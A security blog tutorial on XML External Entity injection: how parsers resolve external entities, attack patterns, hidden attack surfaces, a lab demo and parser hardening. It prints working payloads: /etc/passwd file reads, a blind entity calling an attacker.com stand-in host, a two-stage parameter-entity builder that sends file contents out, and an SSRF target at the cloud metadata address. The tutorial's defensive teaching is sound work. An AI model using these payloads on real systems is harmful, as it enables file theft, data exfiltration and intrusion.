EncryptCodec
Injection · April 8, 2026 · 9 min read

XML External Entity (XXE) Injection: How to Find, Exploit, and Prevent It

You push a new endpoint that accepts XML for a legacy integration. QA signs off. Six months later a bug bounty hunter reads /etc/passwd off your production server and files a critical report — and the fix is a single line of parser configuration you never knew you needed.

XXE is one of the most underestimated injection classes because the vulnerability isn't in your code; it's in a library default. Disable external entity processing in your XML parser and you eliminate the entire XXE attack surface. Everything below shows you why that default exists, how attackers abuse it, and exactly how to turn it off across the stacks developers actually use.

Why XML Parsers Resolve External Entities at All

The XML 1.0 spec includes a feature called external entities: a way to include content from another file or URL inside an XML document. It was designed for things like shared DTD fragments in document publishing pipelines. Nobody building REST APIs needs it, but because the spec permits it (and requires validating parsers to load external entities), many XML parsers, including Java's built-in JAXP factories, have historically resolved them by default.

When a parser encounters this:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>

A parser with external entity resolution enabled opens /etc/passwd, reads its contents, and substitutes them into the document before your application code ever sees the XML. The file read happens inside the parser, before any of your validation logic runs.
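To make the ordering concrete, here is a toy model in JavaScript of what a permissive parser does with that document. It is not a real XML parser and not any library's API: the hypothetical expandExternalEntities function only understands SYSTEM entity declarations in the internal subset, and the resolve callback stands in for the parser's file or network read, returning a fixed fake passwd line instead of touching the disk.

```javascript
// Toy model of external entity expansion. NOT a real XML parser:
// it only recognises <!ENTITY name SYSTEM "uri"> declarations.
function expandExternalEntities(xml, resolve) {
  // 1. Collect external entity declarations from the internal DTD subset.
  const declarations = new Map();
  const declPattern = /<!ENTITY\s+([A-Za-z_][\w.-]*)\s+SYSTEM\s+"([^"]*)"\s*>/g;
  for (const match of xml.matchAll(declPattern)) {
    declarations.set(match[1], match[2]);
  }

  // 2. Drop the DOCTYPE block; application code never sees it.
  const body = xml.replace(/<!DOCTYPE[\s\S]*?\]>\s*/, '');

  // 3. Replace each &name; reference with whatever its URI resolves to.
  //    Unknown references such as &amp; are left untouched.
  return body.replace(/&([A-Za-z_][\w.-]*);/g, (ref, name) =>
    declarations.has(name) ? resolve(declarations.get(name)) : ref
  );
}

const payload = `<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>`;

const fetched = [];
const result = expandExternalEntities(payload, (uri) => {
  fetched.push(uri); // a real parser would open this file or URL here
  return 'root:x:0:0:root:/root:/bin/bash';
});

console.log(result);
```

By the time result reaches application code, the DOCTYPE is gone and the "file" contents sit inside <root> like ordinary data, which is why validation that runs after parsing cannot catch it.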

The Three XXE Attack Patterns

Classic file read is the most common. The attacker injects an entity pointing to a local file (file:///etc/passwd or file:///proc/self/environ on Linux, file:///C:/Windows/win.ini on Windows), and the response reflects the file contents. This works whenever the parsed content is echoed back: in an error message, a response field, or a document preview.

Summary: the parser reads a local file and echoes its content in the response.

Payload:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<user>
  <name>&xxe;</name>
</user>

Impact: arbitrary local file read.
Detection: easy, because the response reflects the file content.

Relative exploitability vs. stealth: exploitability 95%, stealth 20%.
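For lab work or an authorized test, the classic pattern reduces to two small pieces: build the payload for a chosen file, then check whether the response reflects it. This is a sketch with hypothetical helper names (buildFileReadPayload, looksLikePasswd); the passwd check assumes a Unix-style target whose file contains the usual root entry.

```javascript
// Hypothetical helpers for a lab or an authorized test of the classic pattern.
function buildFileReadPayload(filePath, elementName = 'name') {
  if (filePath.includes('"')) {
    throw new Error('file path must not contain a double quote');
  }
  // Build a file: URI; Windows paths get forward slashes (C:\x -> file:///C:/x).
  const uri = 'file:///' + filePath.replace(/\\/g, '/').replace(/^\/+/, '');
  return [
    '<?xml version="1.0"?>',
    '<!DOCTYPE foo [',
    `  <!ENTITY xxe SYSTEM "${uri}">`,
    ']>',
    `<user><${elementName}>&xxe;</${elementName}></user>`,
  ].join('\n');
}

// A reflected /etc/passwd almost always contains the root entry (UID 0, GID 0),
// whether it comes back as plain text, inside an XML element, or in JSON.
function looksLikePasswd(responseBody) {
  return /\broot:[^:\n]*:0:0:/.test(responseBody);
}
```

Send buildFileReadPayload('/etc/passwd') in place of a legitimate request body and run looksLikePasswd over the response. The elementName parameter exists because the entity reference has to sit in a field the application actually echoes.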

Blind XXE via out-of-band exfiltration is used when the application parses the XML but doesn't echo the result. The attacker defines an entity that makes an HTTP request to a server they control:

<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://attacker.com/steal?data=secret">
]>
<root>&xxe;</root>

Even if the app returns nothing, the attacker's server logs the request, which confirms that the parser resolves external entities. With a slightly more sophisticated two-stage payload using parameter entities, the attacker can exfiltrate actual file contents in the URL of that outbound request, or through DNS lookups when a firewall blocks outbound HTTP.
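The two-stage payload usually looks like the sketch below, which builds both documents as strings. The attacker origin, the /xxe.dtd path, and the d query parameter are placeholders, and filePath is assumed to be an absolute Unix path. The second stage lives in an external DTD because the XML spec does not allow parameter-entity references inside markup declarations in the internal subset, so the nested declaration that splices the file contents into a URL has to be defined externally. File contents with newlines or URL-unsafe characters often break the fetch, which is why short single-line files such as /etc/hostname are typical first targets.

```javascript
// Builds the two documents of the common parameter-entity out-of-band pattern.
// attackerOrigin, the /xxe.dtd path and the d parameter are placeholders.
function buildOobPayloads(attackerOrigin, filePath) {
  // Stage 1, sent to the target: it only pulls in the attacker-hosted DTD.
  const requestBody = [
    '<?xml version="1.0"?>',
    '<!DOCTYPE foo [',
    `  <!ENTITY % remote SYSTEM "${attackerOrigin}/xxe.dtd">`,
    '  %remote;',
    ']>',
    '<foo>test</foo>',
  ].join('\n');

  // Stage 2, served at attackerOrigin/xxe.dtd. %file; is substituted into
  // eval's value when eval is declared; &#x25; is an escaped "%", so the exfil
  // declaration only takes effect when %eval; expands, and %exfil; fires the request.
  const externalDtd = [
    `<!ENTITY % file SYSTEM "file://${filePath}">`,
    `<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM '${attackerOrigin}/?d=%file;'>">`,
    '%eval;',
    '%exfil;',
  ].join('\n');

  return { requestBody, externalDtd };
}
```

Serve externalDtd from the attacker origin and send requestBody to the target. If the parser processes external parameter entities, the server log shows a request whose d parameter carries the file contents.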

SSRF via XXE targets internal services. The entity URL points to http://169.254.169.254/latest/meta-data/ (AWS instance metadata), internal admin panels, or other services on the private network that aren't exposed publicly. The server fetches the URL on the attacker's behalf and may return the response.
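When you log or triage entity URIs (during a code review, or from a WAF alert), it helps to sort them into local files, internal destinations, and everything else. The sketch below is a hypothetical heuristic, not a security control: it only inspects the literal hostname, so a DNS name that resolves to an internal address will still be classified as external.

```javascript
const net = require('net');

// Hypothetical triage heuristic for an entity's SYSTEM URI. It inspects the
// literal host only; it does not resolve DNS, so it is not an SSRF control.
function classifyEntityTarget(uri) {
  let url;
  try {
    url = new URL(uri);
  } catch {
    return 'unparseable';
  }
  if (url.protocol === 'file:') return 'local-file';

  const host = url.hostname.replace(/^\[|\]$/g, '').toLowerCase(); // strip IPv6 brackets
  if (host === 'localhost') return 'internal';

  if (net.isIPv4(host)) {
    const [a, b] = host.split('.').map(Number);
    if (
      a === 10 ||
      a === 127 ||
      (a === 169 && b === 254) || // link-local, includes the 169.254.169.254 metadata address
      (a === 172 && b >= 16 && b <= 31) ||
      (a === 192 && b === 168)
    ) {
      return 'internal';
    }
  }

  // IPv6 loopback, link-local (fe80::/10) and unique-local (fc00::/7) addresses.
  if (net.isIPv6(host) && (host === '::1' || /^fe[89ab]/.test(host) || /^f[cd]/.test(host))) {
    return 'internal';
  }
  return 'external';
}
```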

Where XXE Hides in Real Applications

The obvious place is any endpoint that accepts Content-Type: application/xml. The non-obvious places are what trip up developers:

File upload handlers that process DOCX, XLSX, PPTX, ODT, or SVG files. The Office and OpenDocument formats are ZIP archives containing XML, and SVG is plain XML. If your server unzips and parses them, or hands an SVG to a library that parses it, every upload endpoint becomes an XXE surface. A malicious SVG uploaded as a profile picture has exploited production apps at major companies.
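A first step in mapping this surface is knowing which uploads will reach an XML parser, regardless of the extension or Content-Type the client claims. This hypothetical helper sniffs the first bytes of a Node.js Buffer: the Office and OpenDocument formats start with the ZIP local file header PK\x03\x04, and SVG starts with markup. It only tells you where to look; the control is still a hardened parser.

```javascript
// Hypothetical helper: does this upload end up in an XML parser?
// Assumes the raw upload is available as a Node.js Buffer.
function uploadReachesXmlParser(buf) {
  // DOCX, XLSX, PPTX and ODT are ZIP archives; ZIP files start with "PK\x03\x04".
  const isZip =
    buf.length >= 4 && buf[0] === 0x50 && buf[1] === 0x4b && buf[2] === 0x03 && buf[3] === 0x04;
  if (isZip) return 'zip-container'; // unzip and treat every XML part as untrusted

  // SVG and other XML: ignore a UTF-8 BOM and leading whitespace, then look for markup.
  const head = buf.subarray(0, 1024).toString('utf8').replace(/^\uFEFF/, '').trimStart();
  if (head.startsWith('<')) return 'xml-like';

  return 'none';
}
```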

SOAP web services still exist everywhere in enterprise Java and .NET stacks. Every SOAP request is XML. Legacy integrations that nobody touches for years are often running ancient parser configurations.

PDF generators that accept HTML with embedded SVG. The PDF library parses the SVG, which can contain XXE payloads.

XML-based configuration parsers — if your app lets users upload configuration files in XML format (think Ant build files, Maven POMs, or custom formats), those go through a parser too.

How to Exploit XXE Safely in a Lab

Before you test anything in production, understand the mechanics in a controlled environment. A basic Node.js setup demonstrates the issue clearly:

# Install a vulnerable XML parsing setup for local testing only
npm install libxmljs
// VULNERABLE - do not use in production
const libxmljs = require('libxmljs');

const payload = `<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<user><name>&xxe;</name></user>`;

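// Deliberately vulnerable: noent: true tells libxml2 to substitute entities,
// including external ones (the same libxml2 option PHP exposes as LIBXML_NOENT)
const doc = libxmljs.parseXml(payload, { noent: true });
console.log(doc.get('//name').text()); // prints the contents of /etc/passwd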

The LIBXML_NOENT flag in PHP is the single most common XXE mistake I've seen in code reviews. Developers add it thinking "NOENT" means "no entities" — it actually means "substitute entities from the DTD." At least one significant PHP application had this exact misconfiguration in a file upload path for years.

Prevention: The Exact Configuration You Need

The fix is the same everywhere: disable DTD processing entirely, or at minimum disable external entity resolution. If you don't have a legitimate use case for DTDs (almost nobody does), disable them completely.

// Use a safe-by-default parser
const xmlString = '<user><name>alice</name></user>'; // sample input

// Option 1: fast-xml-parser (no external entity support)
const { XMLParser } = require('fast-xml-parser');
const parser = new XMLParser();
const result = parser.parse(xmlString);
console.log(result.user.name); // "alice"

// Option 2: xml2js, a pure-JavaScript parser built on sax (not on libxml),
// which does not resolve external entities
const xml2js = require('xml2js');
xml2js.parseString(xmlString, (err, parsed) => {
  if (err) throw err;
  // safe: external entities are not resolved
  console.log(parsed.user.name[0]); // "alice"
});
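If some XML passes through a component whose parser you cannot configure, a cheap extra layer is to refuse any document that declares a DTD before it gets there. This is a defense-in-depth sketch with a hypothetical rejectDtd helper, assuming the input is an already-decoded string and that the same string is what you pass to the parser. It is deliberately conservative: a DOCTYPE inside a comment or CDATA section is rejected too.

```javascript
// Defense-in-depth sketch: refuse documents that declare a DTD at all.
// rejectDtd is a hypothetical helper; it assumes xml is an already-decoded string.
function rejectDtd(xml) {
  const text = xml.replace(/^\uFEFF/, ''); // drop a leading byte order mark
  // Case-insensitive on purpose: being stricter than the spec costs nothing here.
  if (/<!DOCTYPE/i.test(text)) {
    throw new Error('XML documents with a DOCTYPE are not accepted');
  }
  return text;
}
```

Call it in front of the parser, for example parser.parse(rejectDtd(body)), and return a 400 when it throws.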

One Edge Case That Catches Senior Developers

If you're using JSON APIs exclusively, you might think you're safe. You're not if you're using Spring Boot with the Jackson XML module (jackson-dataformat-xml), or if your content negotiation middleware accepts both JSON and XML based on the Content-Type header. An attacker sends Content-Type: application/xml to your JSON endpoint. If the framework routes it to an XML deserializer, the parser configuration on that path might be different from your main XML handler.

Test every endpoint with both Content-Type: application/json and Content-Type: application/xml headers. The XML path may never have been reviewed.
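A sketch of that test, assuming Node 18+ for the global fetch. Instead of an external entity, the XML probe declares two harmless internal entities whose values only form the marker string xxe-canary-7f3a when the parser expands them, so a raw echo of the request body is not mistaken for expansion. The marker, the probe body, and the helper names are all hypothetical.

```javascript
// Sketch of the dual Content-Type test (assumes Node 18+ for global fetch).
// The canary is split across two internal entities so that only real entity
// expansion, not a raw echo of the request body, produces the joined string.
const CANARY_HEAD = 'xxe-canary-';
const CANARY_TAIL = '7f3a';
const CANARY = CANARY_HEAD + CANARY_TAIL;

function buildProbes(url) {
  const xmlBody =
    '<?xml version="1.0"?>' +
    `<!DOCTYPE probe [<!ENTITY a "${CANARY_HEAD}"><!ENTITY b "${CANARY_TAIL}">]>` +
    '<probe><name>&a;&b;</name></probe>';
  return [
    { url, headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ name: 'probe' }) },
    { url, headers: { 'Content-Type': 'application/xml' }, body: xmlBody },
  ];
}

async function runProbes(url) {
  const results = [];
  for (const probe of buildProbes(url)) {
    const res = await fetch(probe.url, { method: 'POST', headers: probe.headers, body: probe.body });
    const text = await res.text();
    results.push({
      contentType: probe.headers['Content-Type'],
      status: res.status,
      entityExpanded: text.includes(CANARY), // only possible on the XML probe
    });
  }
  return results;
}
```

An entityExpanded: true result on the application/xml probe means that path processes DTDs and deserves a close look; a 415 Unsupported Media Type means XML is not accepted there at all. If the endpoint never echoes input, the status codes are the only signal you get.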

Audit Checklist

Before you close the ticket, verify these:

  • Every XML parser instance has external entity processing disabled — not just the ones you wrote this week
  • File upload handlers for DOCX, XLSX, SVG, and ODT validate file type and parse with a hardened parser
  • SOAP endpoints use a DocumentBuilderFactory (or equivalent) hardened the same way as your other parsers
  • Content negotiation middleware doesn't route unexpected XML to a less-secured parser
  • Outbound network access from your app servers is restricted so blind XXE can't easily exfiltrate data even if a parser is misconfigured (defense in depth, not a primary control)
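For the content negotiation item, the simplest fix on a JSON-only route is to reject anything that is not JSON before any deserializer runs. The helpers below are hypothetical and written against Node's plain http request and response objects; in Spring, the consumes attribute on a request mapping serves a similar purpose.

```javascript
// Hypothetical guard for JSON-only routes, written against Node's http module
// objects (IncomingMessage lower-cases header names).
function isJsonContentType(header) {
  if (typeof header !== 'string') return false;
  const mediaType = header.split(';')[0].trim().toLowerCase();
  return mediaType === 'application/json' || mediaType.endsWith('+json');
}

// Returns true if the request may proceed; otherwise answers 415 and returns false.
function guardJsonOnly(req, res) {
  if (!isJsonContentType(req.headers['content-type'])) {
    res.statusCode = 415; // Unsupported Media Type
    res.end();
    return false;
  }
  return true;
}
```

In a handler passed to http.createServer, call guardJsonOnly(req, res) first and return early when it yields false.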

Grep your codebase for LIBXML_NOENT (PHP), resolve_entities=True (Python's lxml), DocumentBuilderFactory.newInstance() without subsequent feature flags, and any use of XMLInputFactory.newInstance() in Java without SUPPORT_DTD set to false. Those are the patterns to hunt.
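The same hunt can be scripted. The sketch below is a rough file-level heuristic with hypothetical rule names, not a replacement for a real static analysis tool: the Java rules only ask whether a hardening string such as disallow-doctype-decl or SUPPORT_DTD set to false appears anywhere in the same file, not whether it is applied to the right factory.

```javascript
const fs = require('fs');
const path = require('path');

// Heuristic, file-level rules for the patterns above.
const RULES = [
  { id: 'php-libxml-noent', test: (src) => /LIBXML_NOENT/.test(src) },
  { id: 'lxml-resolve-entities', test: (src) => /resolve_entities\s*=\s*True/.test(src) },
  {
    id: 'java-dbf-no-doctype-ban',
    test: (src) =>
      /DocumentBuilderFactory\.newInstance\(\)/.test(src) && !/disallow-doctype-decl/.test(src),
  },
  {
    id: 'java-stax-dtd-enabled',
    test: (src) =>
      /XMLInputFactory\.newInstance\(\)/.test(src) &&
      !/SUPPORT_DTD\s*,\s*(false|Boolean\.FALSE)/.test(src),
  },
];

// Returns one finding per rule that matches the given source text.
function scanSource(fileName, src) {
  return RULES.filter((rule) => rule.test(src)).map((rule) => ({ file: fileName, rule: rule.id }));
}

// Recursively scans a directory, skipping node_modules and dot-directories.
function scanTree(dir, exts = ['.java', '.kt', '.php', '.py']) {
  const findings = [];
  for (const entry of fs.readdirSync(dir, { withFileTypes: true })) {
    const full = path.join(dir, entry.name);
    if (entry.isDirectory()) {
      if (entry.name !== 'node_modules' && !entry.name.startsWith('.')) {
        findings.push(...scanTree(full, exts));
      }
    } else if (exts.includes(path.extname(entry.name))) {
      findings.push(...scanSource(full, fs.readFileSync(full, 'utf8')));
    }
  }
  return findings;
}
```

Run console.log(scanTree('./src')) from the repository root and review each finding by hand.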

Pick one XML-consuming endpoint in your current project right now (a file upload, a SOAP service, a feed parser) and verify its parser configuration against the code above. One afternoon of auditing can remove a vulnerability class that had its own OWASP Top 10 category in 2017 (A4:2017 XML External Entities) before it was folded into Security Misconfiguration in 2021.


Frequently Asked Questions